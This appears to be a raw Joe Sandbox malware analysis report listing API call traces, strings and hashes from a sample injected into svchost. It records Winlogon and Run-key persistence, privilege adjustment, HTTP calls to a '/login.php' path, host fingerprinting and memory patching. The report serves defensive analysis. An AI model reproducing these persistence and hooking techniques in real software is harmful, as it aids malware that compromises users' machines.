                                                                                                                                                                                                                • Part of subcall function 02CB4880: FindCloseChangeNotification.KERNEL32(?), ref: 02CB494C
                                                                                                                                                                                                                • Part of subcall function 02CB4880: GetHandleInformation.KERNEL32(00000000,?), ref: 02CB495E
                                                                                                                                                                                                                • Part of subcall function 02CB4880: CloseHandle.KERNEL32(00000000), ref: 02CB496F
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 02C97A1E
                                                                                                                                                                                                              • GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 02C97A37
                                                                                                                                                                                                              • GetUserObjectInformationA.USER32(00000000), ref: 02C97A3E
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,5dd2ba1da), ref: 02C97A54
                                                                                                                                                                                                              • memset.MSVCRT ref: 02C97A99
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02C97AB3
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,?), ref: 02C97AC6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Information$HandleOpenProcess$CloseCurrentThreadToken$ChangeCharDesktopFindMutexNotificationObjectQuerySystemUpperUser_snprintflstrcmpimemset
                                                                                                                                                                                                              • String ID: 5dd2ba1da$Global\HighMemoryEvent_%08x
                                                                                                                                                                                                              • API String ID: 2411378745-749939932
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 02CB5940
                                                                                                                                                                                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,02CA4D1B,?,?,00000000), ref: 02CB5947
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000020,02CA4D1B,?,?,?,?,02CA4D1B,?,?,00000000), ref: 02CB5957
                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,02CA4D1B,?,?,00000000), ref: 02CB595E
                                                                                                                                                                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 02CB5981
                                                                                                                                                                                                              • AdjustTokenPrivileges.KERNELBASE(02CA4D1B,00000000,00000001,00000000,00000000,00000000), ref: 02CB599B
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CB59A5
                                                                                                                                                                                                              • FindCloseChangeNotification.KERNEL32(02CA4D1B), ref: 02CB59B6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Token$CurrentOpenProcessThread$AdjustChangeCloseErrorFindLastLookupNotificationPrivilegePrivilegesValue
                                                                                                                                                                                                              • String ID: SeSecurityPrivilege
                                                                                                                                                                                                              • API String ID: 348569255-2333288578
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,61FF864A), ref: 029B1451
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000000,00000000,0AFB4677), ref: 029B1515
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2975747606.00000000029B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_29b0000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocLibraryLoadVirtual
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3550616410-0

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 450 2ca7dd0-2ca7de2 451 2ca7de5-2ca7dea 450->451 451->451 452 2ca7dec-2ca7df3 451->452 453 2ca7df9-2ca7e06 PathFileExistsA 452->453 454 2ca7fd7-2ca7fdf IsUserAnAdmin 452->454 453->454 457 2ca7e0c-2ca7e2b RegOpenKeyExA 453->457 455 2ca7ff8-2ca8008 454->455 456 2ca7fe1-2ca7ff6 454->456 458 2ca800d-2ca8015 RegOpenKeyExA 455->458 456->458 459 2ca7f78-2ca7f91 RegOpenKeyExA 457->459 460 2ca7e31-2ca7e55 RegQueryValueExA 457->460 462 2ca806b-2ca8071 458->462 463 2ca8017-2ca8026 CreateEventA 458->463 459->454 461 2ca7f93-2ca7f9b 459->461 464 2ca7e5b-2ca7e75 GetProcessHeap HeapAlloc 460->464 465 2ca7f68-2ca7f76 RegFlushKey 460->465 467 2ca7fa0-2ca7fa5 461->467 463->462 468 2ca8028-2ca803b RegNotifyChangeKeyValue 463->468 464->465 469 2ca7e7b-2ca7ea9 memset RegQueryValueExA StrStrIA 464->469 466 2ca7fd1 RegCloseKey 465->466 466->454 467->467 470 2ca7fa7-2ca7fd0 RegSetValueExA RegFlushKey 467->470 471 2ca8041-2ca8048 WaitForSingleObject 468->471 472 2ca7eaf-2ca7eb1 469->472 473 2ca7f46-2ca7f5a GetProcessHeap HeapValidate 469->473 470->466 471->471 474 2ca804a-2ca8050 471->474 475 2ca7eb4-2ca7eb9 472->475 473->465 476 2ca7f5c-2ca7f62 GetProcessHeap HeapFree 473->476 477 2ca805c-2ca8069 RegNotifyChangeKeyValue 474->477 478 2ca8052-2ca8057 call 2cb4a10 474->478 475->475 479 2ca7ebb-2ca7ebd 475->479 476->465 477->471 478->477 480 2ca7ebf-2ca7ec4 479->480 481 2ca7ee1-2ca7ee6 479->481 480->481 483 2ca7ec6-2ca7ec9 480->483 484 2ca7ee8-2ca7eed 481->484 485 2ca7ed0-2ca7ed6 483->485 484->484 486 2ca7eef-2ca7ef1 484->486 485->485 487 2ca7ed8-2ca7ede 485->487 488 2ca7ef4-2ca7efa 486->488 487->481 488->488 489 2ca7efc-2ca7f0d 488->489 490 2ca7f10-2ca7f16 489->490 490->490 491 2ca7f18-2ca7f24 490->491 492 2ca7f27-2ca7f2c 491->492 492->492 493 2ca7f2e-2ca7f40 
RegSetValueExA 492->493 493->473
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(C:\Windows\apppatch\svchost.exe), ref: 02CA7DFE
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000103,?), ref: 02CA7E27
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(?,userinit,00000000,00000000,00000000,00000000), ref: 02CA7E47
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,-00000010), ref: 02CA7E64
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02CA7E6B
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA7E7F
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(?,userinit,00000000,00000000,00000000,00000000), ref: 02CA7E99
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,C:\Windows\apppatch\svchost.exe), ref: 02CA7EA1
                                                                                                                                                                                                              • RegSetValueExA.KERNEL32(?,userinit,00000000,00000001,00000000,00000002), ref: 02CA7F40
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02CA7F4F
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02CA7F52
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02CA7F5F
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CA7F62
                                                                                                                                                                                                              • RegFlushKey.ADVAPI32(?), ref: 02CA7F6C
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F013F,?), ref: 02CA7F8D
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,userinit,00000000,00000001,C:\Windows\apppatch\svchost.exe,C:\Windows\apppatch\svchost.exe), ref: 02CA7FBD
                                                                                                                                                                                                              • RegFlushKey.ADVAPI32(?), ref: 02CA7FC7
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 02CA7FD1
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CA7FD7
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000001,software\microsoft\windows\currentversion\run,00000000,00000101,?), ref: 02CA800D
                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02CA801C
                                                                                                                                                                                                              • RegNotifyChangeKeyValue.KERNEL32(?,00000000,0000000F,00000000,00000001), ref: 02CA8039
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02CA8044
                                                                                                                                                                                                              • RegNotifyChangeKeyValue.ADVAPI32(?,00000000,0000000F,00000000,00000001), ref: 02CA8067
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
• Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HeapValue$OpenProcess$ChangeFlushNotifyQuery$AdminAllocCloseCreateEventExistsFileFreeObjectPathSingleUserValidateWaitmemset
                                                                                                                                                                                                              • String ID: ,$C:\Windows\apppatch\svchost.exe$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                              • API String ID: 2213373080-1283825033
                                                                                                                                                                                                              • Opcode ID: 8b096dc6d6f4fb92ef948104a2c3e840d927237885b6244feba09df9b7b5946b
                                                                                                                                                                                                              • Instruction ID: cab2e4b4ad96689a7572d4f5bdbc3d6dcfdc20b11c5487e76b60d8e133ce193f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8b096dc6d6f4fb92ef948104a2c3e840d927237885b6244feba09df9b7b5946b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A571CA71A40206FFEB208B649C99FBEB769FF84748F504654F941EB180D7B19A05C7A0

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02C966B0
                                                                                                                                                                                                                • Part of subcall function 02CA4AB0: memset.MSVCRT ref: 02CA4AED
                                                                                                                                                                                                                • Part of subcall function 02CA4AB0: GetProcessHeap.KERNEL32(00000008,00000017,?,?,00000000), ref: 02CA4B27
                                                                                                                                                                                                                • Part of subcall function 02CA4AB0: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 02CA4B2E
                                                                                                                                                                                                                • Part of subcall function 02CA4AB0: memset.MSVCRT ref: 02CA4B3E
                                                                                                                                                                                                                • Part of subcall function 02CA4AB0: memcpy.MSVCRT ref: 02CA4B5D
                                                                                                                                                                                                                • Part of subcall function 02CA4AB0: InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0),00000000,00000000,00000000,04000000), ref: 02CA4BC2
                                                                                                                                                                                                              • calloc.MSVCRT ref: 02C9670F
                                                                                                                                                                                                              • exit.MSVCRT ref: 02C9671F
                                                                                                                                                                                                              • calloc.MSVCRT ref: 02C96729
                                                                                                                                                                                                              • exit.MSVCRT ref: 02C96734
                                                                                                                                                                                                              • calloc.MSVCRT ref: 02C9674F
                                                                                                                                                                                                              • exit.MSVCRT ref: 02C9675C
                                                                                                                                                                                                              • calloc.MSVCRT ref: 02C96766
                                                                                                                                                                                                              • exit.MSVCRT ref: 02C96771
                                                                                                                                                                                                              • calloc.MSVCRT ref: 02C96794
                                                                                                                                                                                                              • exit.MSVCRT ref: 02C967A1
                                                                                                                                                                                                              • calloc.MSVCRT ref: 02C967AB
                                                                                                                                                                                                              • exit.MSVCRT ref: 02C967B6
                                                                                                                                                                                                              • calloc.MSVCRT ref: 02C967D9
                                                                                                                                                                                                              • exit.MSVCRT ref: 02C967E6
                                                                                                                                                                                                              • calloc.MSVCRT ref: 02C967F0
                                                                                                                                                                                                              • exit.MSVCRT ref: 02C967FF
                                                                                                                                                                                                                • Part of subcall function 02CA4AB0: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 02CA4BE1
                                                                                                                                                                                                                • Part of subcall function 02CA4AB0: HttpOpenRequestA.WININET(00000000,GET,00000000,HTTP/1.0,00000000,00000000,00000000,00000001), ref: 02CA4C19
                                                                                                                                                                                                                • Part of subcall function 02CA4AB0: HttpAddRequestHeadersA.WININET(00000000,Content-Type: application/x-www-form-urlencoded,000000FF,20000000), ref: 02CA4C4A
                                                                                                                                                                                                                • Part of subcall function 02CA4AB0: HttpAddRequestHeadersA.WININET(00000000,Referer: http://www.google.com,000000FF,20000000), ref: 02CA4C5E
                                                                                                                                                                                                                • Part of subcall function 02CA4AB0: _snprintf.MSVCRT ref: 02CA4C7C
                                                                                                                                                                                                                • Part of subcall function 02CA4AB0: HttpAddRequestHeadersA.WININET(00000000,?,000000FF,20000000), ref: 02CA4C94
                                                                                                                                                                                                                • Part of subcall function 02CA4AB0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000004), ref: 02CA4CAA
                                                                                                                                                                                                                • Part of subcall function 02CA4AB0: HttpQueryInfoA.WININET(00000000,20000013,00000000,00000004,00000000), ref: 02CA4CCD
                                                                                                                                                                                                                • Part of subcall function 02CA4AB0: CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,?,?,00000000), ref: 02CA4D05
                                                                                                                                                                                                              • _strrev.MSVCRT ref: 02C96869
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000001,?), ref: 02C9692C
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02C9692F
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C9693C
                                                                                                                                                                                                              • RtlFreeHeap.NTDLL(00000000), ref: 02C9693F
                                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(?,00000000,00000001,00000000,/login.php,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 02C9694A
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000,?,?), ref: 02C9695B
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?,?,?), ref: 02C96962
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • 10001, xrefs: 02C9682A
                                                                                                                                                                                                              • /login.php, xrefs: 02C966C1, 02C966D8
                                                                                                                                                                                                              • 6908741AF4E26C68E1EE46F1041F009EECA931D2D53E11AD04CF03DEB7677754725005219D4B978D957ABA1678D353DE5AA0586B49E21F7EFFE2F73D7D2D8E26395286E1EA7A106CD617966D9FC5906C6E952289B4D671BA6ADE1B80ECF2468552F401D4D8134CAF4B56DC5F18B673710974A6F7A9AE9273979C092F52E8D7C9, xrefs: 02C9680D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
• Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: callocexit$HeapHttp$Request$File$HeadersProcessmemset$InternetOpen$AllocAttributesConnectCreateDeleteExistsFreeInfoPathQuerySendValidate_snprintf_strrevmemcpy
                                                                                                                                                                                                              • String ID: /login.php$10001$6908741AF4E26C68E1EE46F1041F009EECA931D2D53E11AD04CF03DEB7677754725005219D4B978D957ABA1678D353DE5AA0586B49E21F7EFFE2F73D7D2D8E26395286E1EA7A106CD617966D9FC5906C6E952289B4D671BA6ADE1B80ECF2468552F401D4D8134CAF4B56DC5F18B673710974A6F7A9AE9273979C092F52E8D7C9
                                                                                                                                                                                                              • API String ID: 1958765476-2761129557
                                                                                                                                                                                                              • Opcode ID: cb99f67e1d6b3e0f97f51f0e3e0f652f7327f233183dd8a788d632456c154623
                                                                                                                                                                                                              • Instruction ID: dbaa6c095aabebea9021136f53e4ad4234eaf1c01e3d949f44d90f68ca0c00cb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cb99f67e1d6b3e0f97f51f0e3e0f652f7327f233183dd8a788d632456c154623
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B18126B0A80311AFEF109F748C49BAA7FACAF41745F144559EA49EB2C1D7F29644CBE0

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02C93106
                                                                                                                                                                                                                • Part of subcall function 02CB4FF0: memset.MSVCRT ref: 02CB5023
                                                                                                                                                                                                                • Part of subcall function 02CB4FF0: GetProcessHeap.KERNEL32(00000008,00000110,?,00000000,00000000), ref: 02CB5032
                                                                                                                                                                                                                • Part of subcall function 02CB4FF0: RtlAllocateHeap.NTDLL(00000000,?,00000000,00000000), ref: 02CB5039
                                                                                                                                                                                                                • Part of subcall function 02CB4FF0: memset.MSVCRT ref: 02CB5051
                                                                                                                                                                                                                • Part of subcall function 02CB4FF0: GetUserNameA.ADVAPI32(00000000,00000104), ref: 02CB5068
                                                                                                                                                                                                                • Part of subcall function 02CB4FF0: GetLastError.KERNEL32(?,?,?,?,00000000,00000000), ref: 02CB506E
                                                                                                                                                                                                                • Part of subcall function 02CB4FF0: GetUserNameA.ADVAPI32(00000000,00000104), ref: 02CB508F
                                                                                                                                                                                                                • Part of subcall function 02CB4FF0: StrChrIA.SHLWAPI(?,?,?,00000000,?,?,?,?,00000000,00000000), ref: 02CB50B6
                                                                                                                                                                                                                • Part of subcall function 02CB4FF0: lstrcpynA.KERNEL32(?,00000001,00000104,?,?,00000000,?,?,?,?,00000000,00000000), ref: 02CB50CA
                                                                                                                                                                                                                • Part of subcall function 02CB50F0: memset.MSVCRT ref: 02CB5124
                                                                                                                                                                                                                • Part of subcall function 02CB50F0: GetProcessHeap.KERNEL32(00000008,00000110,?,00000000,00000000), ref: 02CB5133
                                                                                                                                                                                                                • Part of subcall function 02CB50F0: HeapAlloc.KERNEL32(00000000,?,00000000,00000000), ref: 02CB513A
                                                                                                                                                                                                                • Part of subcall function 02CB50F0: memset.MSVCRT ref: 02CB5152
                                                                                                                                                                                                                • Part of subcall function 02CB50F0: GetComputerNameA.KERNEL32(00000000,00000104), ref: 02CB5169
                                                                                                                                                                                                                • Part of subcall function 02CB50F0: GetLastError.KERNEL32(?,?,?,?,00000000,00000000), ref: 02CB516F
                                                                                                                                                                                                                • Part of subcall function 02CB50F0: GetComputerNameA.KERNEL32(00000000,00000104), ref: 02CB5190
                                                                                                                                                                                                                • Part of subcall function 02CB50F0: StrChrIA.SHLWAPI(?,?,?,00000000,?,?,?,?,00000000,00000000), ref: 02CB51B7
                                                                                                                                                                                                                • Part of subcall function 02CB50F0: lstrcpynA.KERNEL32(?,00000001,00000104,?,?,00000000,?,?,?,?,00000000,00000000), ref: 02CB51CB
                                                                                                                                                                                                              • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104,?,?,74DF2F70,00000000), ref: 02C93144
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?,?,?,74DF2F70,00000000), ref: 02C93151
                                                                                                                                                                                                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,74DF2F70,00000000), ref: 02C93168
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,00000101,?,?,?,74DF2F70,00000000), ref: 02C9318E
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(?,InstallDate,00000000,?,?,?,?,?,74DF2F70,00000000), ref: 02C931AF
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,74DF2F70,00000000), ref: 02C931B9
                                                                                                                                                                                                              • CharUpperA.USER32(00000000,?,?,74DF2F70,00000000), ref: 02C931DF
                                                                                                                                                                                                              • CharUpperA.USER32(00000000,?,?,?,74DF2F70,00000000), ref: 02C931E8
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02C93201
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02C9325F
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,74DF2F70,00000000), ref: 02C9328E
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,74DF2F70,00000000), ref: 02C93297
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,02CA6E07,?,?,74DF2F70,00000000), ref: 02C932A3
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,74DF2F70,00000000), ref: 02C932A6
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,74DF2F70,00000000), ref: 02C932B6
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,74DF2F70,00000000), ref: 02C932B9
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,74DF2F70,00000000), ref: 02C932C5
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,74DF2F70,00000000), ref: 02C932C8
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$memset$Name$CharComputerErrorFreeLastUpperUserValidate_snprintflstrcpyn$AllocAllocateBackslashCloseEnvironmentInformationOpenPathQueryValueVariableVolume
                                                                                                                                                                                                              • String ID: %02X$%53%59%53%54%45%4D%21%38%31%38%32%32%35%21%43%31%42%34%45%39%44%34$%s!%s!%08X$InstallDate$SYSTEM$SYSTEM!818225!C1B4E9D4$Software\Microsoft\Windows NT\CurrentVersion$SystemDrive
                                                                                                                                                                                                              • API String ID: 3299431409-3831095534
                                                                                                                                                                                                              • Opcode ID: e79200394a6f6f310e56426565b5493440f4e3cc5ea813c2d8c33fe5f1157f84
                                                                                                                                                                                                              • Instruction ID: 4bc00afb323ebca5117247dff5371b5399d75f8db6e08ae458ea28579766588b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e79200394a6f6f310e56426565b5493440f4e3cc5ea813c2d8c33fe5f1157f84
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 12510671E40285ABEB209BA99C48FABB7BCEF84740F444595FA05EB141D771DA00CBA0

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 02CAA376
                                                                                                                                                                                                              • GetThreadPriority.KERNEL32(00000000,?,02CAA660,00000000,00000000,?,?,?,?,?,?,02CA98DA,00000000,02CA9730,02CEA04C), ref: 02CAA37D
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 02CAA386
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(02CAA660,00000008,00000040,?,?,02CAA660,00000000,00000000,?,?,?,?,?,?,02CA98DA,00000000), ref: 02CAA3A7
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00000012,00003000,00000040), ref: 02CAA3C6
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(00000000,00000012,00000040,?), ref: 02CAA3E2
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000000,00000004), ref: 02CAA3F8
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000004,-00000068), ref: 02CAA406
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000005,00000000), ref: 02CAA411
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000001,-0000009C), ref: 02CAA424
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000002,-00000081), ref: 02CAA435
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000003,-00000074), ref: 02CAA444
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000004,-00000024), ref: 02CAA453
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000005,-00000004), ref: 02CAA462
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000006,?), ref: 02CAA46A
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000002,-0000009D), ref: 02CAA47D
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000003,-000000C2), ref: 02CAA48E
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000004,-00000004), ref: 02CAA49D
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000005,00000000), ref: 02CAA4A9
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(00000005,00000012,?,00000000), ref: 02CAA4B3
                                                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 02CAA4BB
                                                                                                                                                                                                              • SetThreadPriority.KERNEL32(00000000), ref: 02CAA4C2
                                                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 02CAA4FE
                                                                                                                                                                                                              • SetThreadPriority.KERNEL32(00000000), ref: 02CAA505
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(02CAA660,00000008,00000000,02CAA660), ref: 02CAA51F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExchangeInterlocked$Thread$Virtual$Protect$CurrentPriority$AllocCountTick
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2984368831-0
                                                                                                                                                                                                              • Opcode ID: d7b4de2936b6cb39d9e6b1e370b0d14448c962982f2d1e6c90b2dc13436fc6b0
                                                                                                                                                                                                              • Instruction ID: 3fdb9710a128f93b285790e78493c04b53c7fbc6e274aa7617dd299a78ac9951
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d7b4de2936b6cb39d9e6b1e370b0d14448c962982f2d1e6c90b2dc13436fc6b0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C6518F71941229AFE710AF74CC46FAE77BCFF49320F154928F982E7180DA789951CBA0

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              control_flow_graph 842 4021d0-40231e CreateFileA 843 402350-402355 842->843 844 402320-40234a DeviceIoControl CloseHandle 842->844 844->843
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(\\.\KmxAgent,00000000,00000000,00000000,00000003,00000080,00000000), ref: 00402313
                                                                                                                                                                                                              • DeviceIoControl.KERNEL32(00000000,86000054,000000B4,000000B4,?,00000004,?,00000000), ref: 00402343
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040234A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
